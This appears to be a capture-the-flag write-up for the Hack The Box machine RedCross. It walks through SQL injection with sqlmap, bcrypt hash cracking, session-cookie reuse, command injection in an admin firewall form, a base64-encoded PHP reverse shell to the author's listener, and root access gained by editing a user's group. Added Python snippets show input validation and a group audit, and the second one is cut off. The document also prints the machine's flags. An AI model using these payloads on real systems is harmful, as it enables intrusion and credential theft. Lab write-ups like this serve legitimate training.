RedCross
Tue, 15 October 2024
Platform: Hack The Box
sudo nmap 10.10.10.113 -sV -Pn -r -g53 -D 1.1.1.1 -p- --min-rate=3000 -sC
Nmap scan report for 10.10.10.113
Host is up (0.025s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u3 (protocol 2.0)
| ssh-hostkey:
| 2048 67:d3:85:f8:ee:b8:06:23:59:d7:75:8e:a2:37:d0:a6 (RSA)
| 256 89:b4:65:27:1f:93:72:1a:bc:e3:22:70:90:db:35:96 (ECDSA)
|_ 256 66:bd:a1:1c:32:74:32:e2:e6:64:e8:a5:25:1b:4d:67 (ED25519)
80/tcp open http Apache httpd 2.4.38
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Did not follow redirect to https://intra.redcross.htb/
443/tcp open ssl/http Apache httpd 2.4.38
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Did not follow redirect to https://intra.redcross.htb/
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=intra.redcross.htb/organizationName=Red Cross International/stateOrProvinceName=NY/countryName=US
| Not valid before: 2018-06-03T19:46:58
|_Not valid after: 2021-02-27T19:46:58
Service Info: Host: redcross.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.12 seconds
Both 80 and 443 redirect to https://intra.redcross.htb/, so add the vhost to /etc/hosts:
sudo nano /etc/hosts
10.10.10.113 redcross.htb intra.redcross.htb
feroxbuster -u https://intra.redcross.htb/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -d 3 -q -k -x pdf,txt,php,js | awk '{print " ["$1"]"," "$6}' | awk '/200/{print "\033[32m" $0 "\033[0m"; next}1' | sed '/^ *$/d' | sed '/\[\]/d' | grep -vE 'Auto-filtering|.ico|.css|.png|.gif|.jpg'
[301] https://intra.redcross.htb/images
[302] https://intra.redcross.htb/
[302] https://intra.redcross.htb/index.php
[301] https://intra.redcross.htb/pages
[200] https://intra.redcross.htb/pages/login.php
[200] https://intra.redcross.htb/pages/contact.php
[301] https://intra.redcross.htb/documentation
[200] https://intra.redcross.htb/pages/header.php
feroxbuster -u https://intra.redcross.htb/documentation -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -d 3 -q -k -x pdf,txt,php,js | awk '{print " ["$1"]"," "$6}' | awk '/200/{print "\033[32m" $0 "\033[0m"; next}1' | sed '/^ *$/d' | sed '/\[\]/d' | grep -vE 'Auto-filtering|.ico|.css|.png|.gif|.jpg'
[301] https://intra.redcross.htb/documentation
[200] https://intra.redcross.htb/documentation/account-signup.pdf
https://intra.redcross.htb/documentation/account-signup.pdf
RedCross
documentation dept.
Intranet access request:
Please send a message using our intranet contact form: https://intra.redcross.htb/?page=contact
It’s very important that the subject of the message specifies that you are requesting “credentials”
and also specifies a username in the body of the message in the form:
“username=yourdesiredname”
It’s very important to follow these rules to get the account information as fast as possible, otherwise
the message will be sent to our IT administrator who will take care of it when possible.
https://intra.redcross.htb/?page=contact
subject: credentials
body: username=guest
phone: 0000000000
We are processing your request. Temporary credentials have granted for you:
guest:guest
https://intra.redcross.htb/?page=login
guest:guest
Guest Account Info [1]
From: admin (uid 1) To: guest (uid 5)
You're granted with a low privilege access while we're processing your credentials request. Our messaging system still in beta status. Please report if you find any incidence.
UserID [____] Filter
"><svg/onload=alert(document.cookie)>' OR 1-- {{7*7}}
https://intra.redcross.htb/?o=%22%3E%3Csvg%2Fonload%3Dalert%281%29%3E%27+OR+1--+%7B%7B7*7%7D%7D&page=app
DEBUG INFO: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' at line 1
request.txt
GET /?o=2&page=app HTTP/1.1
Host: intra.redcross.htb
Cookie: PHPSESSID=acssi0klmqacrvllm0ri9hrcu2; LANG=EN_US; SINCE=1728598262; LIMIT=10; DOMAIN=intra
Sec-Ch-Ua: "Chromium";v="129", "Not=A?Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://intra.redcross.htb/?o=1&page=app
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
Connection: close
sqlmap -r request --dbms mysql \
--delay 0 -o --threads 10 --batch \
--dump --proxy http://127.0.0.1:8080
sqlmap {1.8.9#stable} https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 00:40:38 /2024-10-12/
[00:40:38] [INFO] parsing HTTP request from 'request'
[00:40:38] [WARNING] persistent HTTP(s) connections, Keep-Alive, has been disabled because of its incompatibility with HTTP(s) proxy
[00:40:38] [INFO] flushing session file
[00:40:38] [INFO] testing connection to the target URL
got a 301 redirect to 'https://intra.redcross.htb/?o=1&page=app'. Do you want to follow? [Y/n] Y
[00:40:39] [INFO] checking if the target is protected by some kind of WAF/IPS
[00:40:39] [INFO] testing NULL connection to the target URL
[00:40:40] [INFO] NULL connection is supported with 'skip-read' method
[00:40:40] [INFO] testing if the target URL content is stable
[00:40:41] [WARNING] GET parameter 'o' does not appear to be dynamic
[00:40:41] [INFO] heuristic (basic) test shows that GET parameter 'o' might be injectable (possible DBMS: 'MySQL')
[00:40:42] [INFO] heuristic (XSS) test shows that GET parameter 'o' might be vulnerable to cross-site scripting (XSS) attacks
[00:40:42] [INFO] testing for SQL injection on GET parameter 'o'
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[00:40:42] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[00:40:45] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[00:41:16] [WARNING] there is a possibility that the target (or WAF/IPS) is dropping 'suspicious' requests
[00:41:16] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)
[00:41:16] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')
[00:41:16] [INFO] testing 'Generic inline queries'
[00:41:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[00:41:47] [WARNING] reflective value(s) found and filtering out
[00:42:13] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[00:43:32] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)
[00:43:36] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[00:44:40] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)
[00:44:59] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[00:45:48] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)
[00:46:21] [INFO] GET parameter 'o' appears to be 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable
[00:46:21] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[00:46:21] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[00:46:22] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[00:46:22] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[00:46:22] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[00:46:23] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[00:46:23] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[00:46:23] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[00:46:24] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[00:46:24] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[00:46:24] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[00:46:25] [INFO] GET parameter 'o' is 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' injectable
GET parameter 'o' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 701 HTTP(s) requests:
Parameter: o (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: o=1%' RLIKE (SELECT (CASE WHEN (6027=6027) THEN 1 ELSE 0x28 END)) AND 'idkc%'='idkc&page=app
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: o=1%' AND EXTRACTVALUE(3990,CONCAT(0x5c,0x716a626271,(SELECT (ELT(3990=3990,1))),0x716a706a71)) AND 'ssNW%'='ssNW&page=app
Database: redcross
Table: users
[5 entries]
+----+------------------------------+--------+--------------------------------------------------------------+----------+
| id | mail | role | password | username |
+----+------------------------------+--------+--------------------------------------------------------------+----------+
| 1 | admin@redcross.htb | 0 | $2y$10$z/d5GiwZuFqjY1jRiKIPzuPXKt0SthLOyU438ajqRBtrb7ZADpwq. | admin |
| 2 | penelope@redcross.htb | 1 | $2y$10$tY9Y955kyFB | penelope |
| 3 | charles@redcross.htb | 1 | $2y$10$bj5Qh0AbUM5 | charles |
| 4 | tricia.wanderloo@contoso.com | 100 | $2y$10$Dnv/b2ZBca2O4cp0fsBbjeQ/0HnhvJ7WrC/ZN3K7QKqTa9SSKP6r. | tricia |
| 5 | non@available | 1000 | $2y$10$U16O2Ylt/uFtzlVbDIzJ8us9ts8f9ITWoPAWcUfK585sZue03YBAi | guest |
+----+------------------------------+--------+--------------------------------------------------------------+----------+
sql-shell>
select * from users [5]:
[*] 0, 1, admin@redcross.htb, $2y$10$z/d5GiwZuFqjY1jRiKIPzuPXKt0SthLOyU438ajqRBtrb7ZADpwq., admin
[*] 1, 2, penelope@redcross.htb, $2y$10$tY9Y955kyFB37GnW4xrC0.J.FzmkrQhxD..vKCQICvwOEgwfxqgAS, penelope
[*] 1, 3, charles@redcross.htb, $2y$10$bj5Qh0AbUM5wHeu/lTfjg.xPxjRQkqU6T8cs683Eus/Y89GHs.G7i, charles
[*] 100, 4, tricia.wanderloo@contoso.com, $2y$10$Dnv/b2ZBca2O4cp0fsBbjeQ/0HnhvJ7WrC/ZN3K7QKqTa9SSKP6r., tricia
[*] 1000, 5, non@available, $2y$10$U16O2Ylt/uFtzlVbDIzJ8us9ts8f9ITWoPAWcUfK585sZue03YBAi, guest
admin:$2y$10$z/d5GiwZuFqjY1jRiKIPzuPXKt0SthLOyU438ajqRBtrb7ZADpwq.
penelope:$2y$10$tY9Y955kyFB37GnW4xrC0.J.FzmkrQhxD..vKCQICvwOEgwfxqgAS
charles:$2y$10$bj5Qh0AbUM5wHeu/lTfjg.xPxjRQkqU6T8cs683Eus/Y89GHs.G7i
tricia:$2y$10$Dnv/b2ZBca2O4cp0fsBbjeQ/0HnhvJ7WrC/ZN3K7QKqTa9SSKP6r.
guest:$2y$10$U16O2Ylt/uFtzlVbDIzJ8us9ts8f9ITWoPAWcUfK585sZue03YBAi
nano hashes
charles:$2y$10$bj5Qh0AbUM5wHeu/lTfjg.xPxjRQkqU6T8cs683Eus/Y89GHs.G7i
john hashes -w=rockyou
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cookiemonster (?)
1g 0:00:00:40 DONE (2024-10-12 02:52) 0.02481g/s 105.4p/s 105.4c/s 105.4C/s sharpay..topgun
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
charles:cookiemonster
https://intra.redcross.htb/?page=login
charles:cookiemonster
From: charles (uid 3) To: penelope (uid 2)
Hey, my chief contacted me complaining about some problem in the admin webapp. I thought that you reinforced security on it... Alerts everywhere!!
gobuster vhost --append-domain -u redcross.htb -k -r -t100 \
-w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://redcross.htb
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
[+] Append Domain: true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: admin.redcross.htb Status: 200 [Size: 795]
Found: *.redcross.htb Status: 400 [Size: 304]
Progress: 100000 / 100001 (100.00%)
===============================================================
Finished
===============================================================
sudo nano /etc/hosts
10.129.132.149 redcross.htb intra.redcross.htb admin.redcross.htb
TARGET=https://admin.redcross.htb
feroxbuster -u $TARGET -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -d 4 -q -k -x pdf,txt,php,js | awk '{print " ["$1"]"," "$6}' | awk '/200/{print "\033[32m" $0 "\033[0m"; next}1' | sed '/^ *$/d' | sed '/\[\]/d' | grep -vE 'Auto-filtering|.ico|.css|.png|.gif|.jpg';
feroxbuster -u $TARGET -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -d 4 -q -k -x pdf,txt,php,js | awk '{print " ["$1"]"," "$6}' | awk '/200/{print "\033[32m" $0 "\033[0m"; next}1' | sed '/^ *$/d' | sed '/\[\]/d' | grep -vE 'Auto-filtering|.ico|.css|.png|.gif|.jpg';
[301] https://admin.redcross.htb/images
[200] https://admin.redcross.htb/images/it.svg
[302] https://admin.redcross.htb/
[302] https://admin.redcross.htb/index.php
[301] https://admin.redcross.htb/pages
[200] https://admin.redcross.htb/pages/login.php
[302] https://admin.redcross.htb/pages/users.php
[200] https://admin.redcross.htb/pages/header.php
[301] https://admin.redcross.htb/images
[200] https://admin.redcross.htb/images/it.svg
[302] https://admin.redcross.htb/
[301] https://admin.redcross.htb/pages
[301] https://admin.redcross.htb/javascript
[200] https://admin.redcross.htb/pages/login.php
[302] https://admin.redcross.htb/index.php
[301] https://admin.redcross.htb/phpmyadmin
[302] https://admin.redcross.htb/pages/users.php
[301] https://admin.redcross.htb/phpmyadmin/themes
[301] https://admin.redcross.htb/phpmyadmin/js
[200] https://admin.redcross.htb/phpmyadmin/js/whitelist.php
[200] https://admin.redcross.htb/phpmyadmin/js/get_image.js.php
[200] https://admin.redcross.htb/phpmyadmin/doc/html/index.html
[200] https://admin.redcross.htb/phpmyadmin/index.php
[200] https://admin.redcross.htb/phpmyadmin/logout.php
[200] https://admin.redcross.htb/phpmyadmin/js/get_scripts.js.php
[302] https://admin.redcross.htb/phpmyadmin/url.php
[200] https://admin.redcross.htb/phpmyadmin/themes.php
[200] https://admin.redcross.htb/phpmyadmin/db_structure.php
[200] https://admin.redcross.htb/phpmyadmin/js/messages.php
[301] https://admin.redcross.htb/phpmyadmin/themes/original
https://admin.redcross.htb/phpmyadmin/doc/html/index.html
phpMyAdmin 4.6.6 documentation »
"cookiemonster" hints at cookie re-use: a PHPSESSID issued by intra is accepted by admin
login > charles:cookiemonster > intra
https://intra.redcross.htb/?page=app
PHPSESSID=en2pnq6rs08lohhut6207mjsm6
admin.redcross.htb > set PHPSESSID to the intra value > refresh > admin dashboard
https://admin.redcross.htb/?page=cpanel
PHPSESSID=en2pnq6rs08lohhut6207mjsm6
https://admin.redcross.htb/?page=firewall
POST /pages/actions.php HTTP/1.1
Host: admin.redcross.htb
Cookie: PHPSESSID=en2pnq6rs08lohhut6207mjsm6
Content-Length: 47
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="129", "Not=A?Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Origin: https://admin.redcross.htb
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://admin.redcross.htb/?page=firewall
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
Connection: close
ip=10.10.16.7;cat /etc/passwd&id=12&action=deny
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
rtkit:x:105:109:RealtimeKit,,,:/proc:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
lightdm:x:110:113:Light Display Manager:/var/lib/lightdm:/bin/false
pulse:x:111:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false
avahi:x:112:117:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
saned:x:113:118::/var/lib/saned:/bin/false
penelope:x:1000:1000:Penelope,,,:/home/penelope:/bin/bash
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
mysql:x:114:119:MySQL Server,,,:/nonexistent:/bin/false
postgres:x:115:121:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
ftp:x:108:122:ftp daemon,,,:/srv/ftp:/bin/false
systemd-coredump:x:998:998:systemd Core Dumper:/:/usr/sbin/nologin
php -r '$sock=fsockopen("10.10.16.7",4435);popen("/bin/bash <&3 >&3 2>&3", "r");'
;echo+$(echo+cGhwIC1yICckc29jaz1mc29ja29wZW4oIjEwLjEwLjE2LjciLDQ0MzUpO3BvcGVuKCIvYmluL2Jhc2ggPCYzID4mMyAyPiYzIiwgInIiKTsn+|+base64+-d)+|bash
POST /pages/actions.php HTTP/1.1
Host: admin.redcross.htb
Cookie: PHPSESSID=en2pnq6rs08lohhut6207mjsm6
Content-Length: 171
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="129", "Not=A?Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Origin: https://admin.redcross.htb
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://admin.redcross.htb/?page=firewall
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
Connection: close
ip=10.10.16.7;echo+$(echo+cGhwIC1yICckc29jaz1mc29ja29wZW4oIjEwLjEwLjE2LjciLDQ0MzUpO3BvcGVuKCIvYmluL2Jhc2ggPCYzID4mMyAyPiYzIiwgInIiKTsn+|+base64+-d)+|bash&id=12&action=deny
nc -lvnp 4435
Listening on 0.0.0.0 4435
Connection received on 10.10.10.113 60238
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
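Added example (not code from the box or from this writeup): how the firewall action should treat the ip field. The ipaddress module acts as an allow-list and the command is built as an argv list run without a shell, shown next to the interpolation pattern that lets `;cat /etc/passwd` through. iptables as the underlying command is an assumption; the page only shows action=deny.

```python
import ipaddress
import re
import subprocess
from typing import List, Optional

# Constructed sample values: what the form is meant to receive, and the
# injected value from the request above (the ';' ends the intended command
# once the value reaches a shell).
CLEAN_IP = "10.10.16.7"
INJECTED_IP = "10.10.16.7;cat /etc/passwd"

# Shell metacharacters that have no business in an IP address field.
SHELL_META = re.compile(r"[;&|`$(){}<>'\"\\]")


def looks_injected(value: str) -> bool:
    """Log-side check: flag an ip field that carries shell metacharacters."""
    return SHELL_META.search(value) is not None


def canonical_ip(value: str) -> Optional[str]:
    """Allow-list validation: return the canonical IPv4/IPv6 text form, or
    None when the value is not exactly one IP address. The parser does the
    work, so there is no blocklist to bypass."""
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        return None


def build_deny_unsafe(value: str) -> str:
    """The vulnerable pattern: interpolating the field into a command line
    that a shell will parse. Never executed here; kept for contrast."""
    return f"iptables -I INPUT -s {value} -j DROP"


def build_deny_argv(value: str) -> List[str]:
    """Hardened form: validate first, then build an argv list. With
    shell=False the value is a single argument to iptables (assumed command)
    and no shell ever sees it."""
    ip = canonical_ip(value)
    if ip is None:
        raise ValueError(f"rejected ip field: {value!r}")
    return ["iptables", "-I", "INPUT", "-s", ip, "-j", "DROP"]


def deny_ip(value: str, execute: bool = False) -> List[str]:
    """Entry point a firewall handler would call. execute=False by default so
    the example runs anywhere without touching the host firewall."""
    argv = build_deny_argv(value)
    if execute:
        subprocess.run(argv, check=True)  # shell=False is the default
    return argv
```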
www-data@redcross:/var/www$ grep -r -ine 'passw'
html/admin/pages/login.php:7: echo "<tr><td align='right'>Password</td><td><input type='password' name='pass'></input></td></tr>";
html/admin/pages/firewall.php:7: $dbconn = pg_connect("host=127.0.0.1 dbname=redcross user=www password=aXwrtUO9_aa&");
html/admin/pages/users.php:7: $dbconn = pg_connect("host=127.0.0.1 dbname=unix user=unixnss password=fios@ew023xnw");
html/admin/pages/users.php:8: $result = pg_prepare($dbconn, "q1", "SELECT * FROM passwd_table WHERE gid = 1001");
html/admin/pages/actions.php:32: $sql=$mysqli->prepare("SELECT id, password, mail, role FROM users WHERE username = ?");
html/admin/pages/actions.php:44: if(password_verify($pass,$hash) and $role==0){
html/admin/pages/actions.php:66: } else if(password_verify($pass,$hash)){
html/admin/pages/actions.php:95: $dbconn = pg_connect("host=127.0.0.1 dbname=redcross user=www password=aXwrtUO9_aa&");
html/admin/pages/actions.php:109: $dbconn = pg_connect("host=127.0.0.1 dbname=redcross user=www password=aXwrtUO9_aa&");
html/admin/pages/actions.php:116: $passw=generateRandomString();
html/admin/pages/actions.php:117: $phash=crypt($passw);
html/admin/pages/actions.php:118: $dbconn = pg_connect("host=127.0.0.1 dbname=unix user=unixusrmgr password=dheu%7wjx8B&");
html/admin/pages/actions.php:119: $result = pg_prepare($dbconn, "q1", "insert into passwd_table (username, passwd, gid, homedir) values ($1, $2, 1001, '/var/jail/home')");
html/admin/pages/actions.php:122: echo "<b>$username : $passw</b><br><br><a href=/?page=users>Continue</a>";
html/admin/pages/actions.php:127: $dbconn = pg_connect("host=127.0.0.1 dbname=unix user=unixusrmgr password=dheu%7wjx8B&");
html/admin/pages/actions.php:128: $result = pg_prepare($dbconn, "q1", "delete from passwd_table where uid = $1");
html/intra/pages/login.php:7: echo "<tr><td align='right'>Password</td><td><input type='password' name='pass'></input></td></tr>";
html/intra/pages/actions.php:27: $sql=$mysqli->prepare("SELECT id, password, mail, role FROM users WHERE username = ?");
html/intra/pages/actions.php:39: if(password_verify($pass,$hash)){
$dbconn = pg_connect("host=127.0.0.1 dbname=redcross user=www password=aXwrtUO9_aa&");
$dbconn = pg_connect("host=127.0.0.1 dbname=unix user=unixnss password=fios@ew023xnw");
$dbconn = pg_connect("host=127.0.0.1 dbname=redcross user=www password=aXwrtUO9_aa&");
$dbconn = pg_connect("host=127.0.0.1 dbname=redcross user=www password=aXwrtUO9_aa&");
$dbconn = pg_connect("host=127.0.0.1 dbname=unix user=unixusrmgr password=dheu%7wjx8B&");
$dbconn = pg_connect("host=127.0.0.1 dbname=unix user=unixusrmgr password=dheu%7wjx8B&");
https://admin.redcross.htb/?page=users
Add user via admin portal:
Provide this credentials to the user:
daddybigfish : Jokf8n7K
Username UID GID
daddybigfish 2020 1001
psql -h 127.0.0.1 -d unix -U unixusrmgr -W
Password: dheu%7wjx8B&
unix=> \dt
List of relations
Schema | Name | Type | Owner
--------+--------------+-------+----------
public | group_table | table | postgres
public | passwd_table | table | postgres
public | shadow_table | table | postgres
public | usergroups | table | postgres
(4 rows)
unix=> select * from passwd_table;
username | passwd | uid | gid | gecos | homedir | shell
--------------+------------------------------------+------+------+-------+----------------+-----------
tricia | $1$WFsH/kvS$5gAjMYSvbpZFNu//uMPmp. | 2018 | 1001 | | /var/jail/home | /bin/bash
daddybigfish | $1$2tXNdrha$scEI2bk3x54PJHT3fui.T. | 2020 | 1001 | | /var/jail/home | /bin/bash
(1 row)
cat /etc/group
root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:penelope
tty:x:5:
disk:x:6:
lp:x:7:
mail:x:8:
news:x:9:
uucp:x:10:
man:x:12:
proxy:x:13:
kmem:x:15:
dialout:x:20:
fax:x:21:
voice:x:22:
cdrom:x:24:penelope
floppy:x:25:penelope
tape:x:26:
sudo:x:27:
unix=> update passwd_table set gid=27 where username='daddybigfish';
UPDATE 1
unix=> select * from passwd_table;
username | passwd | uid | gid | gecos | homedir | shell
--------------+------------------------------------+------+------+-------+----------------+-----------
tricia | $1$WFsH/kvS$5gAjMYSvbpZFNu//uMPmp. | 2018 | 1001 | | /var/jail/home | /bin/bash
daddybigfish | $1$2tXNdrha$scEI2bk3x54PJHT3fui.T. | 2020 | 27 | | /var/jail/home | /bin/bash
(1 row)
daddybigfish:Jokf8n7K
ssh daddybigfish@10.10.10.113
id
uid=2020(daddybigfish) gid=27(sudo) groups=27(sudo)
sudo -l
User daddybigfish may run the following commands on redcross:
(ALL : ALL) ALL
sudo su
id
uid=0(root) gid=0(root) groups=0(root)
cat /home/penelope/user.txt
9a7662428920bbc36cbf243c6750f703
cat /root/root.txt
270a427d7503fb59b552d77842ff814b
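Added example (not from the box): a Python audit that checks the root vector above from the defender's side. It parses the /etc/group fragment and the two passwd_table states shown on this page and flags any DB-backed account whose primary gid is not the jail gid 1001 that the portal assigns, or that maps to a privileged group. The privileged-group set is an assumption.

```python
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Constructed sample input, copied from the page: an /etc/group fragment and
# the passwd_table rows before and after the gid change.
ETC_GROUP = """\
root:x:0:
adm:x:4:penelope
sudo:x:27:
"""

PASSWD_TABLE_BEFORE = """\
tricia | $1$WFsH/kvS$5gAjMYSvbpZFNu//uMPmp. | 2018 | 1001 | | /var/jail/home | /bin/bash
daddybigfish | $1$2tXNdrha$scEI2bk3x54PJHT3fui.T. | 2020 | 1001 | | /var/jail/home | /bin/bash
"""

PASSWD_TABLE_AFTER = """\
tricia | $1$WFsH/kvS$5gAjMYSvbpZFNu//uMPmp. | 2018 | 1001 | | /var/jail/home | /bin/bash
daddybigfish | $1$2tXNdrha$scEI2bk3x54PJHT3fui.T. | 2020 | 27 | | /var/jail/home | /bin/bash
"""

# Assumption: groups a portal-created account must never land in.
PRIVILEGED_GROUPS = {"root", "adm", "sudo"}
JAIL_GID = 1001  # the gid users.php queries and actions.php inserts


@dataclass
class PasswdRow:
    username: str
    uid: int
    gid: int
    homedir: str
    shell: str


def parse_etc_group(text: str) -> Dict[int, str]:
    """Map gid -> group name from /etc/group formatted text."""
    gid_to_name: Dict[int, str] = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _pw, gid, _members = line.split(":", 3)
        gid_to_name[int(gid)] = name
    return gid_to_name


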